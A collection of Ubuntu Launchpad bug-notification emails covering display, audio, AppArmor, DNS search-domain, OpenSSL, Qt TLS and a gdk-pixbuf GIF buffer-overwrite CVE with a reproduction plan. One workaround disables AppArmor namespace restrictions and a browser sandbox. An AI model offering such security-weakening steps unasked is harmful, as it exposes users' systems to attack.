notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2063884/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2063536] Re: flickering screen
** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/2063536 Title: flickering screen Status in xorg package in Ubuntu: New Bug description: automatically refresh and hang ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 6.5.0-28.29~22.04.1-generic 6.5.13 Uname: Linux 6.5.0-28-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.5 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: pass CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Fri Apr 26 08:44:25 2024 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu DkmsStatus: rtbth/3.9.8, 6.5.0-27-generic, x86_64: installed rtbth/3.9.8, 6.5.0-28-generic, x86_64: installed ExtraDebuggingInterest: Yes GraphicsCard: Intel Corporation CometLake-S GT2 [UHD Graphics 630] [8086:9bc5] (rev 05) (prog-if 00 [VGA controller]) Subsystem: Micro-Star International Co., Ltd. [MSI] CometLake-S GT2 [UHD Graphics 630] [1462:7d82] InstallationDate: Installed on 2024-04-16 (9 days ago) InstallationMedia: Ubuntu 22.04.4 LTS "Jammy Jellyfish" - Release amd64 (20240220) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 002: ID 093a:2510 Pixart Imaging, Inc. Optical Mouse Bus 001 Device 003: ID 1a2c:0e24 China Resource Semico Co., Ltd USB Keyboard Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Lsusb-t: /: Bus 02.Port 1: Dev 1, Class=root_hub, Driver=xhci_hcd/4p, 2M/x2 /: Bus 01.Port 1: Dev 1, Class=root_hub, Driver=xhci_hcd/16p, 480M |__ Port 9: Dev 2, If 0, Class=Human Interface Device, Driver=usbhid, 1.5M |__ Port 10: Dev 3, If 0, Class=Human Interface Device, Driver=usbhid, 1.5M |__ Port 10: Dev 3, If 1, Class=Human Interface Device, Driver=usbhid, 1.5M MachineType: Micro-Star International Co., Ltd. MS-7D82 ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-6.5.0-28-generic root=UUID=5d5b2975-ec40-4c41-919c-f0c2ecc1a822 ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 03/24/2022 dmi.bios.release: 5.19 dmi.bios.vendor: American Megatrends International, LLC. dmi.bios.version: 1.22 dmi.board.asset.tag: Default string dmi.board.name: PRO H410M-B(MS-7D82) dmi.board.vendor: Micro-Star International Co., Ltd. dmi.board.version: 1.0 dmi.chassis.asset.tag: Default string dmi.chassis.type: 3 dmi.chassis.vendor: Micro-Star International Co., Ltd. dmi.chassis.version: 1.0 dmi.modalias: dmi:bvnAmericanMegatrendsInternational,LLC.:bvr1.22:bd03/24/2022:br5.19:svnMicro-StarInternationalCo.,Ltd.:pnMS-7D82:pvr1.0:rvnMicro-StarInternationalCo.,Ltd.:rnPROH410M-B(MS-7D82):rvr1.0:cvnMicro-StarInternationalCo.,Ltd.:ct3:cvr1.0:skuDefaultstring: dmi.product.family: Default string dmi.product.name: MS-7D82 dmi.product.sku: Default string dmi.product.version: 1.0 dmi.sys.vendor: Micro-Star International Co., Ltd. version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.113-2~ubuntu0.22.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 23.2.1-1ubuntu3.1~22.04.2 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.xserver-xorg-core: xserver-xorg-core 2:21.1.4-2ubuntu1.7~22.04.10 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2ubuntu1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/2063536/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2056627] Re: PHPStorm crashes when opening a project
The unfortunate thing with AppImage is that there's no easy default path that can be confined as can be done for other systems. So you'll need to construct an AppArmor profile for your applications following the instructions at https://discourse.ubuntu.com/t/noble-numbat-release- notes/39890#unprivileged-user-namespace-restrictions-15 Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2056627 Title: PHPStorm crashes when opening a project Status in apparmor package in Ubuntu: Confirmed Bug description: Filing mostly in case anyone else hits this and is looking for workarounds: Since the Update to 24.04 PHPStorm crashes on open for me. I think when it tries to preview a markdown file, like a README.md which is shown when opening a project. ``` [0309/094602.913394:FATAL:setuid_sandbox_host.cc(158)] The SUID sandbox helper binary was found, but is not configured correctly. Rather than run without sandboxing I'm aborting now. You need to make sure that /home/user/bin/phpstorm/jbr/lib/chrome-sandbox is owned by root and has mode 4755. ``` Workaround 1 (wont persist reboots, needs root): sudo sysctl -w kernel.apparmor_restrict_unprivileged_unconfined=0 sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 Workaround 2 (persists and doesn't need root): thanks to https://youtrack.jetbrains.com/issue/IDEA-313202/IDE- crashes-due-to-chrome-sandbox-is-owned-by-root-and-has-mode-error- when-IDE-is-launching-the-JCEF-in-a- sandbox#focus=Comments-27-7059083.0-0 * Run `/bin/phpstorm.sh dontReopenProjects` (to avoid it crashing on start) * ctrl+shift+a * type "Registry..." and select it * disable the "ide.browser.jcef.sandbox.enable" option * Restart phpstorm To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2056627/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1976484] Re: never sound ubuntu 20.04 22.04 alsamixer 1.2.6 card sof-hda-dsp
** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to alsa-driver in Ubuntu. https://bugs.launchpad.net/bugs/1976484 Title: never sound ubuntu 20.04 22.04 alsamixer 1.2.6 card sof-hda-dsp Status in alsa-driver package in Ubuntu: New Bug description: no sound ubuntu 20.04 and 22.04 alsamixer 1.2.6 card sof-hda-dsp ships Intel Broxton HDMI, with and no pulseaudio ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: alsa-base 1.0.25+dfsg-0ubuntu7 ProcVersionSignature: Ubuntu 5.15.0-33.34-generic 5.15.30 Uname: Linux 5.15.0-33-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 AudioDevicesInUse: Error: command ['fuser', '-v', '/dev/snd/by-path', '/dev/snd/controlC0', '/dev/snd/hwC0D2', '/dev/snd/pcmC0D3p', '/dev/snd/pcmC0D2p', '/dev/snd/pcmC0D1p', '/dev/snd/pcmC0D7c', '/dev/snd/pcmC0D6c', '/dev/snd/seq', '/dev/snd/timer'] failed with exit code 1: CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Wed Jun 1 11:15:42 2022 InstallationDate: Installed on 2022-05-26 (5 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) PackageArchitecture: all ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=fr_FR.UTF-8 SHELL=/bin/bash SourcePackage: alsa-driver Symptom: audio UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 08/11/2021 dmi.bios.release: 5.12 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: APD-BI-14.1-Y116AR150-098-E dmi.board.asset.tag: Default string dmi.board.name: N14C4WH64 dmi.board.vendor: THOMSON dmi.board.version: Default string dmi.chassis.asset.tag: Default string dmi.chassis.type: 10 dmi.chassis.vendor: Default string dmi.chassis.version: Default string dmi.ec.firmware.release: 5.1 dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvrAPD-BI-14.1-Y116AR150-098-E:bd08/11/2021:br5.12:efr5.1:svnTHOMSON:pnN14C4WH64:pvrDefaultstring:rvnTHOMSON:rnN14C4WH64:rvrDefaultstring:cvnDefaultstring:ct10:cvrDefaultstring:skuN14C4WH64: dmi.product.family: Notebook dmi.product.name: N14C4WH64 dmi.product.sku: N14C4WH64 dmi.product.version: Default string dmi.sys.vendor: THOMSON To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/1976484/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978351] Re: MITM vector: ifupdown puts .domains TLD in resolv.conf
Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures ** Information type changed from Private Security to Public Security ** Tags added: community-security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ifupdown in Ubuntu. https://bugs.launchpad.net/bugs/1978351 Title: MITM vector: ifupdown puts .domains TLD in resolv.conf Status in ifupdown package in Ubuntu: New Bug description: The bug described in https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/1907878?comments=all is a security vulnerability because DNS names that would normally fail are now attempted as "foo.domains". ".domains" is a real TLD, with the registrar "Donuts, Inc." based in Bellvue, WA. "google.com.domains" is registered, for example. So is "test.domains". For users with ifupdown, any Internet request (especially that does not involve some cryptographic payload and destination signature verification) is potentially sending packets to an unintended audience. It's impossible to say, but likely, that malicious registrants are squatting sensitive and common names in the .domains TLD. The ifupdown package is still used by some cloud providers that have not adopted netplan. This vulnerability affects 22.04 and potentially other releases. This issue has not been corrected in 0.8.36+nmu1ubuntu4. With 0.8.36+nmu1ubuntu3 and after an update to 0.8.36+nmu1ubuntu4, the resolv.conf looks like the following (which is vulnerable to mitm attacks): ``` root@foo:~# cat /etc/resolv.conf # This is /run/systemd/resolve/stub-resolv.conf managed by man:systemd-resolved(8). # Do not edit. # # This file might be symlinked as /etc/resolv.conf. If you're looking at # /etc/resolv.conf and seeing this text, you have followed the symlink. # # This is a dynamic resolv.conf file for connecting local clients to the # internal DNS stub resolver of systemd-resolved. This file lists all # configured search domains. # # Run "resolvectl status" to see details about the uplink DNS servers # currently in use. # # Third party programs should typically not access this file directly, but only # through the symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a # different way, replace this symlink by a static file or a different symlink. # # See man:systemd-resolved.service(8) for details about the supported modes of # operation for /etc/resolv.conf. nameserver 127.0.0.53 options edns0 trust-ad search DOMAINS ``` To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/1978351/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1978351] Re: MITM vector: ifupdown puts .domains TLD in resolv.conf
Thanks Marques, do you know if this affects Debian as well? I wonder if they already saw this and fixed it, or if they don't yet know about it. THanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ifupdown in Ubuntu. https://bugs.launchpad.net/bugs/1978351 Title: MITM vector: ifupdown puts .domains TLD in resolv.conf Status in ifupdown package in Ubuntu: New Bug description: The bug described in https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/1907878?comments=all is a security vulnerability because DNS names that would normally fail are now attempted as "foo.domains". ".domains" is a real TLD, with the registrar "Donuts, Inc." based in Bellvue, WA. "google.com.domains" is registered, for example. So is "test.domains". For users with ifupdown, any Internet request (especially that does not involve some cryptographic payload and destination signature verification) is potentially sending packets to an unintended audience. It's impossible to say, but likely, that malicious registrants are squatting sensitive and common names in the .domains TLD. The ifupdown package is still used by some cloud providers that have not adopted netplan. This vulnerability affects 22.04 and potentially other releases. This issue has not been corrected in 0.8.36+nmu1ubuntu4. With 0.8.36+nmu1ubuntu3 and after an update to 0.8.36+nmu1ubuntu4, the resolv.conf looks like the following (which is vulnerable to mitm attacks): ``` root@foo:~# cat /etc/resolv.conf # This is /run/systemd/resolve/stub-resolv.conf managed by man:systemd-resolved(8). # Do not edit. # # This file might be symlinked as /etc/resolv.conf. If you're looking at # /etc/resolv.conf and seeing this text, you have followed the symlink. # # This is a dynamic resolv.conf file for connecting local clients to the # internal DNS stub resolver of systemd-resolved. This file lists all # configured search domains. # # Run "resolvectl status" to see details about the uplink DNS servers # currently in use. # # Third party programs should typically not access this file directly, but only # through the symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a # different way, replace this symlink by a static file or a different symlink. # # See man:systemd-resolved.service(8) for details about the supported modes of # operation for /etc/resolv.conf. nameserver 127.0.0.53 options edns0 trust-ad search DOMAINS ``` To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/1978351/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1981362] Re: rehash command not working on armhf architecture inside chroot
Hello Oscar, I didn't think systemd-nspawn would do architecture emulation on its own. Did you perhaps set up qemu-user-static yourself on systems where this is working, but not set it up on the system where it is failing? Or am I missing a new systemd-nspawn feature? Thanks ** Changed in: openssl (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1981362 Title: rehash command not working on armhf architecture inside chroot Status in openssl package in Ubuntu: Incomplete Bug description: Hi, I found a possible bug in the `openssl rehash` command: it won't do anything while running inside a armhf chroot with an amd64 host architecture. How to reproduce (confirmed on focal and hirsute): 1. Build a armhf chroot environment: `debootstrap --arch armhf --foreign focal ` 2. Go inside chroot (using systemd-nspawn): `systemd-nspawn -D ` 3. Complete debootstrap second stage: `/debootstrap/debootstrap --second-stage` 4. Run rehash in system certs dir: `openssl rehash -n -v /etc/ssl/certs` 5. Rehash shows nothing was done ``` root@ubuntuarm:~# openssl rehash -n -v /etc/ssl/certs Doing /etc/ssl/certs root@ubuntuarm:~# ``` In jammy there is no problem (openssl 3.0.2). $ lsb_release -rd Description:Ubuntu 20.04.4 LTS Release:20.04 $ apt-cache policy openssl openssl: Installed: 1.1.1f-1ubuntu2.16 Candidate: 1.1.1f-1ubuntu2.16 Version table: *** 1.1.1f-1ubuntu2.16 500 500 http://co.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages 500 http://security.ubuntu.com/ubuntu focal-security/main amd64 Packages 100 /var/lib/dpkg/status 1.1.1f-1ubuntu2 500 500 http://co.archive.ubuntu.com/ubuntu focal/main amd64 Packages Full console session (on an armhf chroot, arm64 host arch): root@ubuntuarm:~# openssl rehash -n -v /etc/ssl/certs Doing /etc/ssl/certs root@ubuntuarm:~# openssl version -a OpenSSL 1.1.1f 31 Mar 2020 built on: Mon Apr 20 11:53:50 2020 UTC platform: debian-armhf options: bn(64,32) rc4(char) des(long) blowfish(ptr) compiler: gcc -fPIC -pthread -Wa,--noexecstack -Wall -Wa,--noexecstack -g -O2 -fdebug-prefix-map=/build/openssl-uC90dH/openssl-1.1.1f=. -fstack-protector-strong -Wformat -Werror=format-security -DOPENSSL_TLS_SECURITY_LEVEL=2 -DOPENSSL_USE_NODELETE -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DNDEBUG -Wdate-time -D_FORTIFY_SOURCE=2 OPENSSLDIR: "/usr/lib/ssl" ENGINESDIR: "/usr/lib/arm-linux-gnueabihf/engines-1.1" Seeding source: os-specifi root@ubuntuarm:~# uname -a Linux ubuntuarm 5.4.0-117-generic #132-Ubuntu SMP Thu Jun 2 00:39:06 UTC 2022 armv7l armv7l armv7l GNU/Linux To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1981362/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1981807] Re: qt5-network openssl3 armhf does not support tls1.3
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to qtbase-opensource-src in
Ubuntu.
https://bugs.launchpad.net/bugs/1981807
Title:
qt5-network openssl3 armhf does not support tls1.3
Status in qtbase-opensource-src package in Ubuntu:
New
Bug description:
lsb_release
Description:Ubuntu 22.04 LTS
Release:22.04
libqt5network5/jammy,now 5.15.3+dfsg-2 armhf
libssl3/jammy-updates,jammy-security,now 3.0.2-0ubuntu1.6 armhf
the qt5 armhf version shipped with ubuntu jammy has a regression in
tls1.3 support (simply missing in runtime).
openssl supports tls1.3, so the underlying library works.
x86_64 is obviously not affected
the short sample applications writes -1 on armhf, 15 on x86_64 (unknown
protocol vs tls1.3)
QSslSocket* s = new QSslSocket();
QSslConfiguration cfg = s->sslConfiguration();
cfg.setProtocol(QSsl::TlsV1_3OrLater);
s->setSslConfiguration(cfg);
s->connectToHostEncrypted("tls13-enabled.server",443);
s->waitForConnected();
printf("%d\n",s->sessionProtocol());
marking it as security since the most secure tls protocol is not used
on some platforms
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/qtbase-opensource-src/+bug/1981807/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1982898] Re: CVE-2021-46829: Buffer overwrite in io-gif-animation.c composite_frame() in gdk-pixbuf
** Description changed: [Impact] * A buffer overwrite exists in gdk-pixbuf's thumbnailer. * The GIF loader runs out of memory with specifically crafted files with bad frame data (and images with its sizes) over the integer limit. * After gdk-pixbuf-thum runs out of memory, other apps can and on low RAM systems like my old iMac, the system can completely run out of memory. * Or, in other ways, bad gif files in other applications can open the door for exploits. * Any app using gdk-pixbuf is affected, mainly file managers and image viewers. [Test Plan] * Take the POC's - they can be found in the issue in the GNOME repo * Open them in an application that uses gdk-pixbuf. I have managed to produce reactions with: - Nautilus, GNOME's file manager - Nemo, Cinnamon's file manager - Thunar, XFCE's file manager, which has its own thumbnailere (tumbler) that also inevitably fails and crashes - PCManFM, LXDE's file manager which straight up crashes - - Caja, MATE's file manager causes libpixbufloader-gif to segfault (app still usable, no memory issues) - - Eye of GNOME (eog) triggers the segfault in syslog + - Caja, MATE's file manager causes libpixbufloader-gif to segfault (app still usable, no memory issues) + - Eye of GNOME (eog) triggers the segfault in syslog * If you or the system couldn't tell something is wrong, cat /var/log/syslog and enjoy the segfaults or out of memory warnings or even kernel spam. [Where problems could occur] * The patch itself is simple, but since gdk-pixbuf is often used with GTK apps a mistake here could be problematic. * It is possible, and has happened in the past (which has been patched) that other bad GIFs can cause other crashes. * That patch is essentially overflow checks - changes with GLib (GNOME's, not to be confused with glibc) and the functions used in not only the patch but all of gdk-pixbuf can cause problems * Other failures to properly handle GIFs and broken or intentionally tampered GIFs can continue and always will open the door for security holes for other bugs * Again, overall a simple patch but as long as the GIFs remain handled properly, and no changes to the GLib functions are made and to other apps that use gdk-pixbuf (and assuming are not affected by the change and still work), the patch does not have much regression potential. [Other Info] * Besides Buffer overwrite/overflow issues, as aforementioned out of memory errors can happen. * Files attached are examples or crashes * Again, all apps using gdk-pixbuf are affected * https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/merge_requests/121/ - * https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/190https://github.com/pedrib/PoC/blob/master/fuzzing/CVE-2021-46829/CVE-2021-46829.md + * https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/190 + * https://github.com/pedrib/PoC/blob/master/fuzzing/CVE-2021-46829/CVE-2021-46829.md ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: libgdk-pixbuf2.0-0 2.40.0+dfsg-3ubuntu0.2 ProcVersionSignature: Ubuntu 5.15.0-43.46~20.04.1-generic 5.15.39 Uname: Linux 5.15.0-43-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.24 Architecture: amd64 CasperMD5CheckResult: skip CurrentDesktop: X-Cinnamon Date: Tue Jul 26 19:33:41 2022 InstallationDate: Installed on 2021-11-24 (244 days ago) InstallationMedia: ubuntucinnamonremix "@BASECODENAME" (20210826) SourcePackage: gdk-pixbuf UpgradeStatus: No upgrade log present (probably fresh install) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to gdk-pixbuf in Ubuntu. https://bugs.launchpad.net/bugs/1982898 Title: CVE-2021-46829: Buffer overwrite in io-gif-animation.c composite_frame() in gdk-pixbuf Status in gdk-pixbuf package in Ubuntu: In Progress Bug description: [Impact] * A buffer overwrite exists in gdk-pixbuf's thumbnailer. * The GIF loader runs out of memory with specifically crafted files with bad frame data (and images with its sizes) over the integer limit. * After gdk-pixbuf-thum runs out of memory, other apps can and on low RAM systems like my old iMac, the system can completely run out of memory. * Or, in other ways, bad gif files in other applications can open the door for exploits. * Any app using gdk-pixbuf is affected, mainly file managers and image viewers. [Test Plan] * Take the POC's - they can be found in the issue in the GNOME repo * Open them in an application that uses gdk-pixbuf. I have managed to produce reactions with: - Nautilus, GNOME's file manager - Nemo, Cinnamon's file manager - Thunar, XFCE's file manager, which has its own thumbnailere (tumbler) that also inevitably fails and crashes - PCManFM, LXDE's file manager which straight up crashes - Caja, MATE's file manager causes libp
[Touch-packages] [Bug 1958055] Re: sudo apport-kde is in a different design (stripped XDG_CURRENT_DESKTOP)
I'm a bit surprised ubuntu-bug shows a GUI when run under sudo at all. I think I'd expect the usual X11 "no cookies" failure to connect. Running X programs as another user is bound to be trouble. Perhaps ubuntu-bug should quit immediately if it detects running via sudo, su, etc things? Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to sudo in Ubuntu. https://bugs.launchpad.net/bugs/1958055 Title: sudo apport-kde is in a different design (stripped XDG_CURRENT_DESKTOP) Status in sudo package in Ubuntu: Confirmed Bug description: Running ubuntu-bug as normal user has the correct theme (see screenshots attached to bug #1881640), but running "sudo ubuntu-bug" has a different, non-matching theme (see attached screenshot). This problem can be reproduce by running a KDE application on Ubuntu Desktop (GNOME): 1. Launch ubuntu-22.04-desktop-amd64.iso 2. Install apport-kde 3. Run: /usr/share/apport/apport-kde -f 4. Run: sudo /usr/share/apport/apport-kde -f 5. Compare both windows. They have different icons and font size. Same result with KDE: 1. Use kubuntu-22.04-desktop-amd64.iso 2. Run ubuntu-bug -f 3. Run: sudo ubuntu-bug -f [Analysis] Qt needs XDG_CURRENT_DESKTOP to be set to determine the correct theme, but XDG_CURRENT_DESKTOP is not in the list of environment variables to preserve (and not in env_keep in /etc/sudoers). [Workaround] Prevent sudo from dropping XDG_CURRENT_DESKTOP by running: sudo XDG_CURRENT_DESKTOP=$XDG_CURRENT_DESKTOP /usr/share/apport/apport-kde -f ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: apport 2.20.9-0ubuntu7.27 ProcVersionSignature: Ubuntu 5.4.0-94.106~18.04.1-generic 5.4.157 Uname: Linux 5.4.0-94-generic i686 ApportVersion: 2.20.9-0ubuntu7.27 Architecture: i386 CurrentDesktop: KDE Date: Sun Jan 16 05:04:24 2022 InstallationDate: Installed on 2022-01-15 (0 days ago) InstallationMedia: Kubuntu 18.04.5 LTS "Bionic Beaver" - Release i386 (20200806.1) PackageArchitecture: all SourcePackage: apport UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/sudo/+bug/1958055/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1839598] Re: tcp_wrappers does not whitelisting of domains, vs IPs
** Changed in: tcp-wrappers (Ubuntu) Status: New => Won't Fix -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tcp-wrappers in Ubuntu. https://bugs.launchpad.net/bugs/1839598 Title: tcp_wrappers does not whitelisting of domains, vs IPs Status in tcp-wrappers package in Ubuntu: Won't Fix Bug description: TCP Wrappers (also known as tcp_wrappers) is a host-based networking ACL system, used to filter network access to Internet Protocol servers. It allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens on which to filter for access control purposes. The original code was written by Wietse Venema in 1990 He maintained it until 1995, and on June 1, 2001, released it under its own BSD-style license. The tarball includes a library named Libwrap that implements the actual functionality. I had an email conversation with him that lead to nowhere. He does not agree with my request for a redesign. Very concisely, there is no way as of now to whitelist a domain, vs an IP address. You need to know the IP address to which the domain resolves to beforehand, which makes domain updates impossible to process. This causes tremendous operational problems when the person you need to give access to has an IP address that changes often. But I need to digress. Every foreign worker is a potential hacker, for there is no way to perform a security check on her/him. Many companies use them nevertheless because of the low cost. I know a company that hires North Korean engineers working out of mainland China. They log in for legitimate purposes to American corporate servers. They actually live in North Korea and are forced to back home every 3 weeks. They only have access to dynamic IP addresses, where a PTR record does not exist, thus, no reverse-hostname is possible. As a fact: no dynamic IP address has a corresponding PTR record. The question is how to whitelist a remote worker’s IP automatically. This issue cannot be easily solved since commercial VPNs do not guarantee that the same IP will be offered on the next connection. Many small companies that hire foreign workers end up creating fence servers, but that is exponentially more insecure since now you have a potential hacker sitting comfortably inside your firewall, behind your line of defense. Your network may have access to other companies networks, all the way up to a power station or a government facility, maybe a nuclear facility. A very somber scenario. Since Libwrap is the ultimate defense to keep hackers from controlling your servers, it should ONLY verify if an incoming connection resolves to a domain listed in /etc/hosts.allow. It does not. Prior, it performs a hostname check that invariably fails unless the pair IP address/ domain exists in /etc/hosts, but of course that information changes sometimes hourly. As a result of this problem, you cannot use it as a gatekeeper for remote access from dynamic IP addresses, increasing your level of insecurity. As I said, I explained all these ideas to the author, Wietse, without success. He insisted that using a public key was how you protect servers. I disagree. Without Libwrap, which means IP whitelisting, a simple public key mechanism is suicidal. It is very easy to see why. In a first step, a hacker steals the pair public-private key from a box which has legitimate access to your network. Then he uses the pair in another box located in his country, from which he will access your network as if he were the legitimate client or worker. It happened to me already. Libwrap applied to a domain plus public key will perform infinitely better than a public key alone. In fact, public key alone should not be used at all. This is obvious since by using it, you are delegating your security to the box you are allowing to connect, so your entire network is now as secure as your client or worker’s home network, which you don’t control. You just opened the doors of your company wide-open. What I suggest is to modify Libwrap so a domain listed in /etc/hosts.allow would work for real, just performing a simple DNS lookup to will match the IP address to the domain. Right now, this is impossible. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/tcp-wrappers/+bug/1839598/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1987228] Re: Bug display when turning to hibernation
** Information type changed from Private Security to Public Security ** Also affects: gnome-shell (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1987228 Title: Bug display when turning to hibernation Status in gnome-shell package in Ubuntu: New Status in xorg package in Ubuntu: New Bug description: When I put the computer to sleep, there are small display glitches for a few seconds. Then, when I wake from sleep mode, my desktop and opened windows show up for a few seconds before the login screen. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-46.49-generic 5.15.39 Uname: Linux 5.15.0-46-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: unknown Date: Mon Aug 22 00:22:25 2022 DistUpgraded: 2022-08-11 21:55:03,477 DEBUG Running PostInstallScript: '/usr/lib/ubuntu-advantage/upgrade_lts_contract.py' DistroCodename: jammy DistroVariant: ubuntu ExtraDebuggingInterest: Yes, including running git bisection searches GraphicsCard: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0126] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company 2nd Generation Core Processor Family Integrated Graphics Controller [103c:161c] InstallationDate: Installed on 2021-03-26 (513 days ago) InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1) MachineType: Hewlett-Packard HP EliteBook 8460p ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-46-generic 